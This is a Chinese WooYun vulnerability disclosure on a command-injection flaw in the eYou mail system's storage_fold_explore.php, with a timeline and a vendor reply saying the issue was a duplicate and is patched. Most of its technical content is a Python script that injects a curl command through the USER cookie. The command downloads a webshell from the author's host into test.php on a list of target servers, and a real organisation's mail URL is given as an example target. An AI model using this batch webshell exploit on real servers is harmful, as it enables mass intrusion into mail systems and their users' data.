当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-058531

漏洞标题:亿邮邮件系统命令执行漏洞导致批量Getwebshell

相关厂商:北京亿中邮信息技术有限公司

漏洞作者: conqu3r

提交时间:2014-04-26 15:02

修复时间:2014-06-10 15:03

公开时间:2014-06-10 15:03

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-04-26: 细节已通知厂商并且等待厂商处理中
2014-04-30: 厂商已经确认,细节仅向厂商公开
2014-05-10: 细节向核心白帽子及相关领域专家公开
2014-05-20: 细节向普通白帽子公开
2014-05-30: 细节向实习白帽子公开
2014-06-10: 细节向公众公开

简要描述:

这套系统还有很多问题,能登录就更多问题了。

详细说明:

user/storage_fold_explore.php

<?php
/**
* 用户网络存储目录列表
*
* 该页面显示登录邮箱用户的网络存储目录列表,选择后保存邮件附件到指定的目录中。
*
* @author FengHui <fenghui@eyou.net>
* @copyright 199902008 eYou.net
* @version storage_explore.php 2008/11/12
*/
require_once('/var/eyou/apache/htdocs/config.php');
require_once(PATH.'inc/function.php');
require_once(PATH.'inc/libeyou.php');
require_once(PATH.'inc/operate.php');
require_once(PATH.'inc/user.config.php');
$skin = getCookieUserValue('SKIN');
$uid = getCookieUserValue('UID');
$domain = getCookieUserValue('DOMAIN');
$user_dir_path = getUserDirPath($uid, $domain);
$storage_index_path = $user_dir_path.'/storage/Index/';
$storage_data_path = $user_dir_path.'/storage/Data/';
$file_name = htmlspecialchars(get('file'));
$att = htmlspecialchars(get('att'));
?>


GetUser_DirPath在/inc/function.php下。

function getUserDirPath($uid, $domain) {
$cmd = "/var/eyou/sbin/hashid $uid $domain";
$path = `$cmd`;
$path = trim($path);
return $path;
}


漏洞证明:

利用代码:

__author__ = 'zengzhang'
import time,sys
import urllib,urllib2
from urlparse import urlparse
def Getwebshell(url):
url=url.strip()
header={"Cookie":"USER=UID%3d1|curl http://conqu3r.paxmac.org/test.txt>>test.php&DOMAIN%3d127.0.0.1"}
try:
request=urllib2.Request(url,None,headers=header)
rep=urllib2.urlopen(request)
except:
pass
Indentified(url)
def Readfile(filen):
fp=open(filen,'r')
for url in fp:
if url!='':
Getwebshell(url)
def Indentified(url):
url=url[:-19]
url=url+"test.php"
try:
f=urllib.urlopen(url).getcode()
if f==200:
fp=open("shell.txt","w+")
fp.write(url+"\n")
fp.close()
except:
pass
Readfile("url.txt")


url.txt内容为:http://mail.bjsasc.com/user/storage_fold_explore.php形式

EF3B5D39-11D7-4760-8E23-A0CA283D7843.png


修复方案:

你们懂的。。。

版权声明:转载请注明来源 conqu3r@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-04-30 10:59

厂商回复:

和之前的重复了,已出补丁,多谢提供!

最新状态:

暂无